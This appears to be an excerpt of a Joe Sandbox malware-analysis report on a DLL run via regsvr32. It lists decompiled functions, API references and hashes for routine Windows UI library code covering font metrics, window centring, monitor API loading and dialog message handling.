API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: a10e408677da65a9049b9ee3c20e6653e67fb0d03e17293cf2b2882766c9b63a
Instruction ID: ce08965bab60f43240e971fe2fabb6775eff4411df9fbfce07cac65b623b5ae5
Opcode Fuzzy Hash: a10e408677da65a9049b9ee3c20e6653e67fb0d03e17293cf2b2882766c9b63a
Instruction Fuzzy Hash: A251A171600226ABDB01DF64CD88F9E3BB9FF083A2F624165F955D7191C734EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10046E37 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 94
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10046E37(void* __ecx, CHAR* _a4, void* _a8, int _a12, int _a16, int* _a20) {
				int _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICA _v72;
				struct tagLOGFONTA _v132;
				signed int _t34;
				void* _t39;
				int _t43;
				int _t44;
				struct HDC__* _t56;
				signed int _t59;
				int _t63;
				int _t64;
				int* _t65;

				_t56 = GetDC(0);
				E1001AB60( &_v132, 0, 0x3c);
				_t34 = MulDiv(_a8 & 0x0000ffff, GetDeviceCaps(_t56, 0x5a), 0x48);
				_v132.lfWeight = 0x190;
				_v132.lfHeight =  ~_t34;
				_v132.lfCharSet = 1;
				lstrcpyA( &(_v132.lfFaceName), _a4);
				_t39 = CreateFontIndirectA( &_v132);
				_a4 = _t39;
				if(_t39 == 0) {
					_t64 = GetDialogBaseUnits() & 0x0000ffff;
					_t63 = GetDialogBaseUnits() >> 0x10;
				} else {
					_a8 = SelectObject(_t56, _t39);
					GetTextMetricsA(_t56,  &_v72);
					_t63 = _v72.tmExternalLeading + _v72.tmHeight;
					GetTextExtentPoint32A(_t56, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16);
					_t59 = 0x34;
					asm("cdq");
					_v8 = (_v16.cx + 0x1a) / _t59;
					SelectObject(_t56, _a8);
					DeleteObject(_a4);
					_t64 = _v8;
				}
				ReleaseDC(0, _t56);
				_t43 = MulDiv(_a12, _t64, 4);
				_t65 = _a20;
				 *_t65 = _t43;
				_t44 = MulDiv(_a16, _t63, 8);
				_t65[1] = _t44;
				return _t44;
			}

0x10046e4b
0x10046e55
0x10046e6e
0x10046e77
0x10046e80
0x10046e87
0x10046e8b
0x10046e95
0x10046e9d
0x10046ea0
0x10046f00
0x10046f07
0x10046ea2
0x10046eac
0x10046eb4
0x10046ec0
0x10046ecf
0x10046edd
0x10046ede
0x10046ee5
0x10046ee8
0x10046eed
0x10046ef3
0x10046ef3
0x10046f0d
0x10046f19
0x10046f1f
0x10046f28
0x10046f2a
0x10046f30
0x10046f37

APIs

GetDC.USER32(00000000), ref: 10046E45
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10046E62
MulDiv.KERNEL32 ref: 10046E6E
lstrcpyA.KERNEL32(?,?), ref: 10046E8B
CreateFontIndirectA.GDI32(?), ref: 10046E95
SelectObject.GDI32(00000000,00000000), ref: 10046EAA
GetTextMetricsA.GDI32(00000000,?), ref: 10046EB4
GetTextExtentPoint32A.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 10046ECF
SelectObject.GDI32(00000000,?), ref: 10046EE8
DeleteObject.GDI32(?), ref: 10046EED
GetDialogBaseUnits.USER32 ref: 10046EFE
GetDialogBaseUnits.USER32 ref: 10046F03
ReleaseDC.USER32(00000000,00000000), ref: 10046F0D
MulDiv.KERNEL32 ref: 10046F19
MulDiv.KERNEL32 ref: 10046F2A

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 10046EC9

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$BaseDialogSelectTextUnits$CapsCreateDeleteDeviceExtentFontIndirectMetricsPoint32Releaselstrcpy
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1174750853-222967699
Opcode ID: 4a5fa6454128e1b952b42018af00c77757821f8d0e000a56d6795d4f77bbd291
Instruction ID: 249d1b8aca59d6d5e291bf5967e56d31d967f56206e6a9f0960ac9b168f38170
Opcode Fuzzy Hash: 4a5fa6454128e1b952b42018af00c77757821f8d0e000a56d6795d4f77bbd291
Instruction Fuzzy Hash: 9E314F76900219FFEB149FA5CC89B9E7BB8FB48345F104016FA09E7291D774AA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100445B8 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E100445B8(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100452DE(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E1000EB06(E1000EA9B(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E1000E8A5();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E1000EB06(E1000EA9B(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E1004546A(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x100445b8
0x100445c0
0x100445c3
0x100445cb
0x100445ce
0x100445d3
0x100445de
0x100445f0
0x100445e0
0x100445e3
0x100445e3
0x100445f6
0x100445fa
0x10044606
0x1004460e
0x10044610
0x10044610
0x1004460e
0x100445d5
0x100445d5
0x100445d5
0x1004461f
0x10044625
0x100446c5
0x100446cc
0x100446d3
0x100446dd
0x1004462b
0x1004462d
0x10044632
0x1004463d
0x10044646
0x10044646
0x1004463d
0x1004464a
0x10044651
0x10044692
0x100446a1
0x100446ae
0x10044653
0x10044653
0x1004465a
0x1004465c
0x1004465c
0x1004466c
0x1004467f
0x10044689
0x10044689
0x10044651
0x100446ee
0x100446f4
0x100446f7
0x100446fe
0x10044701
0x10044708
0x1004470f
0x10044716
0x1004471d
0x10044722
0x10044729
0x10044730
0x10044738
0x10044738
0x10044724
0x10044724
0x10044724
0x1004473d
0x10044749
0x10044751
0x10044751
0x1004473f
0x1004473f
0x1004473f
0x1004476a

APIs

Part of subcall function 100452DE: GetWindowLongA.USER32(?,000000F0), ref: 100452EA

GetParent.USER32(?), ref: 100445E3
SendMessageA.USER32 ref: 10044606
GetWindowRect.USER32(?,?), ref: 1004461F
GetWindowLongA.USER32(00000000,000000F0), ref: 10044632
CopyRect.USER32(?,?), ref: 1004467F
CopyRect.USER32(?,?), ref: 10044689
GetWindowRect.USER32(00000000,?), ref: 10044692
CopyRect.USER32(?,?), ref: 100446AE

Strings

@, xrefs: 10044621
(, xrefs: 1004464A

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 54ae66569aaed79b838ad1e2219f9dee9e2796b371de928678d1d9e38ee5efc5
Instruction ID: 4fad1e22c395538b3013f170e50286153856c3cc519778885bff6c470461a568
Opcode Fuzzy Hash: 54ae66569aaed79b838ad1e2219f9dee9e2796b371de928678d1d9e38ee5efc5
Instruction Fuzzy Hash: DF518F76A00219ABDB05CBA8CC85EEEBBB9EF49350F264125F905F3185DB30ED058B64

Uniqueness

Uniqueness Score: -1.00%

Function 1000E8C9 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000E8C9() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x100947f0; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x100947d8 = 0;
						 *0x100947dc = 0;
						 *0x100947e0 = 0;
						 *0x100947e4 = 0;
						 *0x100947e8 = 0;
						 *0x100947ec = 0;
						 *0x100947f0 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x100947d8 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x100947dc = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x100947e0 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x100947e4 = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x100947ec = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x100947e8 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x100947f0 = _t11;
					return _t11;
				}
				_t18 =  *0x100947e8; // 0x0
				return 0 | _t18 != 0x00000000;
			}

0x1000e8cc
0x1000e8d4
0x1000e8f1
0x1000e8f5
0x1000e96d
0x1000e96d
0x1000e973
0x1000e979
0x1000e97f
0x1000e985
0x1000e98b
0x1000e991
0x00000000
0x1000e99b
0x1000e903
0x1000e907
0x1000e90c
0x00000000
0x00000000
0x1000e914
0x1000e918
0x1000e91d
0x00000000
0x00000000
0x1000e925
0x1000e929
0x1000e92e
0x00000000
0x00000000
0x1000e936
0x1000e93a
0x1000e93f
0x00000000
0x00000000
0x1000e947
0x1000e94b
0x1000e950
0x00000000
0x00000000
0x1000e958
0x1000e95c
0x1000e961
0x00000000
0x00000000
0x1000e965
0x1000e966
0x00000000
0x1000e966
0x1000e8d8
0x00000000

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,1000E9F8), ref: 1000E8EB
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,1000E9F8), ref: 1000E903
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,1000E9F8), ref: 1000E914
GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,1000E9F8), ref: 1000E925
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,1000E9F8), ref: 1000E936
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,1000E9F8), ref: 1000E947
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,1000E9F8), ref: 1000E958

Strings

MonitorFromWindow, xrefs: 1000E90E
EnumDisplayMonitors, xrefs: 1000E941
MonitorFromPoint, xrefs: 1000E930
MonitorFromRect, xrefs: 1000E91F
USER32, xrefs: 1000E8E6
GetMonitorInfoA, xrefs: 1000E952
GetSystemMetrics, xrefs: 1000E8FD

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 01075d664090cbdb360885e6d356185bbbb3645146e239c84b57f430dc85af75
Instruction ID: 4aa1b670ed4d2acac35c54a50302953e2daa4c56c690cd1d2413340b46853318
Opcode Fuzzy Hash: 01075d664090cbdb360885e6d356185bbbb3645146e239c84b57f430dc85af75
Instruction Fuzzy Hash: 45114C74A086699AF345DFA99CC0D6AFAE5F74A380353457FE11CE2668CB344885DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10016216 Relevance: 24.3, APIs: 16, Instructions: 319
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10016216(void* __ecx) {
				signed int _t93;
				signed int _t97;
				signed char _t98;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				void* _t111;
				signed char _t115;
				struct HWND__* _t116;
				signed int _t119;
				signed char _t121;
				signed char _t122;
				int _t123;
				short _t128;
				int _t129;
				signed int _t135;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				short _t141;
				WPARAM _t143;
				intOrPtr _t144;
				signed int* _t145;
				int _t152;
				signed char _t153;
				signed int _t158;
				void* _t164;
				struct HWND__* _t168;
				signed int _t169;
				signed int _t173;
				signed int _t177;
				struct tagMSG* _t178;
				signed int _t179;
				intOrPtr _t180;
				void* _t181;
				void* _t183;

				E1001A9E0(0x10077b40, _t181);
				 *((intOrPtr*)(_t181 - 0x10)) = _t183 - 0x18;
				_t93 = E10041F78(_t181, GetFocus());
				 *(_t181 - 0x14) = _t93;
				if(_t93 != 0) {
					 *(_t181 - 0x20) =  *(_t93 + 0x1c);
				} else {
					 *(_t181 - 0x20) =  *(_t181 - 0x20) & _t93;
				}
				_t158 =  *(_t181 + 8);
				if(_t158 != 0) {
					 *(_t181 - 0x24) =  *(_t158 + 0x1c);
				} else {
					 *(_t181 - 0x24) =  *(_t181 - 0x24) & _t158;
				}
				_t160 =  *(_t181 + 0xc);
				_t152 =  *(_t181 + 0xc)->message;
				 *(_t181 - 0x18) = _t152;
				if(_t152 < 0x100 || _t152 > 0x108) {
					if(_t152 < 0x200 || _t152 > 0x209) {
						goto L29;
					} else {
						goto L10;
					}
				} else {
					L10:
					_t179 = _t93;
					if(_t93 == 0) {
						L19:
						if(_t152 == 0x101 || _t152 == 0x100 || _t152 == 0x102) {
							if(_t179 == 0) {
								goto L29;
							}
							_t180 =  *((intOrPtr*)(_t179 + 0x38));
							if(_t180 == 0) {
								goto L29;
							}
							_t143 =  *(_t181 + 0xc)->wParam;
							if(_t143 != 0xd || ( *(_t180 + 0x80) & 0x00000001) == 0) {
								if(_t143 != 0x1b || ( *(_t180 + 0x80) & 0x00000002) == 0) {
									goto L29;
								} else {
									goto L28;
								}
							} else {
								L28:
								_t102 = 0;
								goto L59;
							}
						} else {
							L29:
							_t168 = E10041F78(_t181,  *( *(_t181 + 0xc)));
							_t173 = 0;
							_t97 =  *(_t181 - 0x18) - 0x100;
							__eflags = _t97;
							 *(_t181 - 0x1c) = 0;
							_t153 = 2;
							if(_t97 == 0) {
								_t98 = E10015C35(_t168,  *(_t181 + 0xc));
								_t160 =  *(_t181 + 0xc)->wParam & 0x0000ffff;
								__eflags = _t160 - 0x1b;
								if(__eflags > 0) {
									__eflags = _t160 - 0x25;
									if(_t160 < 0x25) {
										L52:
										_t169 = IsDialogMessageA( *( *(_t181 + 8) + 0x1c),  *(_t181 + 0xc));
										__eflags = _t169;
										if(_t169 != 0) {
											_t111 = E10041F78(_t181, GetFocus());
											__eflags = _t111 -  *(_t181 - 0x14);
											if(_t111 !=  *(_t181 - 0x14)) {
												E10015F05(_t160, _t181, E10041F78(_t181, GetFocus()));
												_pop(_t160);
											}
										}
										L55:
										_t101 = IsWindow( *(_t181 - 0x20));
										__eflags = _t101;
										if(_t101 != 0) {
											E10015F62(_t160,  *(_t181 - 0x14), E10041F78(_t181, GetFocus()));
											_pop(_t164);
											_t106 = IsWindow( *(_t181 - 0x24));
											__eflags = _t106;
											if(_t106 != 0) {
												E10016129(_t164,  *(_t181 + 8),  *(_t181 - 0x14), E10041F78(_t181, GetFocus()));
											}
										}
										_t102 = _t169;
										goto L59;
									}
									__eflags = _t160 - 0x26;
									if(_t160 <= 0x26) {
										 *(_t181 - 0x1c) = 1;
										L80:
										_t115 = E10015C35( *(_t181 - 0x14),  *(_t181 + 0xc));
										__eflags = _t115 & 0x00000001;
										if((_t115 & 0x00000001) != 0) {
											goto L52;
										}
										_t116 =  *(_t181 - 0x14);
										__eflags = _t116;
										if(_t116 != 0) {
											_t116 =  *(_t116 + 0x1c);
										}
										_t119 = E10041F78(_t181, GetNextDlgGroupItem( *( *(_t181 + 8) + 0x1c), _t116,  *(_t181 - 0x1c)));
										__eflags = _t119;
										if(_t119 == 0) {
											goto L52;
										} else {
											__eflags =  *(_t119 + 0x38);
											if( *(_t119 + 0x38) == 0) {
												goto L52;
											}
											E10015C63(_t119);
											L78:
											_t169 = 1;
											goto L55;
										}
									}
									__eflags = _t160 - 0x28;
									if(_t160 <= 0x28) {
										goto L80;
									}
									__eflags = _t160 - 0x2b;
									if(_t160 != 0x2b) {
										goto L52;
									}
									L69:
									_t121 = E10016079( *(_t181 - 0x14));
									__eflags = _t121 & 0x00000010;
									_pop(_t160);
									if((_t121 & 0x00000010) == 0) {
										_t122 = E100160FC( *(_t181 + 8));
									} else {
										_t173 =  *(_t181 - 0x14);
										_t160 = _t173;
										_t122 = E100453E5(_t173);
									}
									__eflags = _t173;
									_t153 = _t122;
									if(_t173 != 0) {
										L74:
										_t160 = _t173;
										_t123 = E100454E0(_t173);
										__eflags = _t123;
										if(_t123 != 0) {
											__eflags =  *(_t173 + 0x38);
											if( *(_t173 + 0x38) == 0) {
												goto L52;
											}
											_push(0);
											_push(0);
											_push(0);
											_push(1);
											_push(0xfffffdd9);
											_push(_t173);
											 *(_t181 - 4) = 0;
											E10045543();
											_t77 = _t181 - 4;
											 *_t77 =  *(_t181 - 4) | 0xffffffff;
											__eflags =  *_t77;
											goto L78;
										}
										MessageBeep(_t123);
										goto L52;
									} else {
										L73:
										_t173 = E10015FD5( *(_t181 + 8), _t153);
										__eflags = _t173;
										if(_t173 == 0) {
											goto L52;
										}
										goto L74;
									}
								}
								if(__eflags == 0) {
									goto L73;
								}
								__eflags = _t160 - 3;
								if(_t160 == 3) {
									goto L73;
								}
								__eflags = _t160 - 9;
								if(_t160 == 9) {
									__eflags = _t98 & 0x00000002;
									if((_t98 & 0x00000002) != 0) {
										goto L52;
									}
									_t128 = GetKeyState(0x10);
									__eflags = _t128;
									_t160 = 0 | _t128 < 0x00000000;
									__eflags = _t168;
									_t129 = _t128 < 0;
									if(_t168 != 0) {
										_t168 =  *(_t168 + 0x1c);
									}
									_t177 = E10041F78(_t181, GetNextDlgTabItem( *( *(_t181 + 8) + 0x1c), _t168, _t129));
									__eflags = _t177;
									if(_t177 != 0) {
										E10015C63(_t177);
										E10015F62(_t160,  *(_t181 - 0x14), _t177);
										_pop(_t160);
									}
									goto L78;
								}
								__eflags = _t160 - 0xd;
								if(_t160 == 0xd) {
									goto L69;
								}
								goto L52;
							}
							_t135 = _t97 - _t153;
							__eflags = _t135;
							if(_t135 == 0) {
								_t178 =  *(_t181 + 0xc);
								L37:
								__eflags = _t168 -  *(_t181 + 8);
								if(_t168 ==  *(_t181 + 8)) {
									goto L43;
								}
								_t136 = E10015C35(_t168, _t178);
								__eflags =  *(_t181 - 0x18) - 0x102;
								if( *(_t181 - 0x18) != 0x102) {
									L40:
									_t160 = _t178->wParam;
									__eflags = _t160 - 9;
									if(_t160 != 9) {
										L42:
										__eflags = _t160 - 0x20;
										if(_t160 != 0x20) {
											_t137 = E10015E90(_t160,  *(_t181 + 8), _t168, _t178);
											__eflags = _t137;
											if(_t137 == 0) {
												goto L52;
											}
											_t138 =  *(_t137 + 0x38);
											__eflags = _t138;
											if(_t138 == 0) {
												goto L52;
											}
											_t160 = _t138;
											E10011A76(_t138, _t178);
											goto L78;
										}
										goto L43;
									}
									__eflags = _t153 & _t136;
									if((_t153 & _t136) != 0) {
										goto L52;
									}
									goto L42;
								}
								__eflags = _t136 & 0x00000084;
								if((_t136 & 0x00000084) != 0) {
									goto L52;
								}
								goto L40;
							}
							__eflags = _t135 != 4;
							if(_t135 != 4) {
								goto L52;
							}
							__eflags =  *(_t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								L34:
								_t178 =  *(_t181 + 0xc);
								__eflags = _t178->wParam - 0x20;
								if(_t178->wParam == 0x20) {
									goto L52;
								} else {
									goto L37;
								}
							}
							_t141 = GetKeyState(0x12);
							__eflags = _t141;
							if(_t141 >= 0) {
								goto L52;
							}
							goto L34;
						}
					} else {
						while( *((intOrPtr*)(_t179 + 0x38)) == 0 && E10041F78(_t181, GetParent( *(_t179 + 0x1c))) !=  *(_t181 + 8)) {
							_t179 = E10041F78(_t181, GetParent( *(_t179 + 0x1c)));
							if(_t179 != 0) {
								continue;
							}
							break;
						}
						if(_t179 == 0) {
							goto L19;
						}
						_t144 =  *((intOrPtr*)(_t179 + 0x38));
						if(_t144 == 0) {
							goto L19;
						}
						_t145 =  *(_t144 + 0x54);
						if(_t145 == 0) {
							goto L19;
						}
						_push( *(_t181 + 0xc));
						_t160 =  *_t145;
						_push(_t145);
						if( *((intOrPtr*)( *_t145 + 0x14))() == 0) {
							L43:
							_t102 = 1;
							L59:
							 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
							return _t102;
						}
						goto L19;
					}
				}
			}

0x1001621b
0x10016226
0x10016230
0x10016237
0x1001623a
0x10016244
0x1001623c
0x1001623c
0x1001623c
0x10016247
0x1001624c
0x10016256
0x1001624e
0x1001624e
0x1001624e
0x10016259
0x1001625c
0x10016265
0x10016268
0x10016278
0x00000000
0x00000000
0x00000000
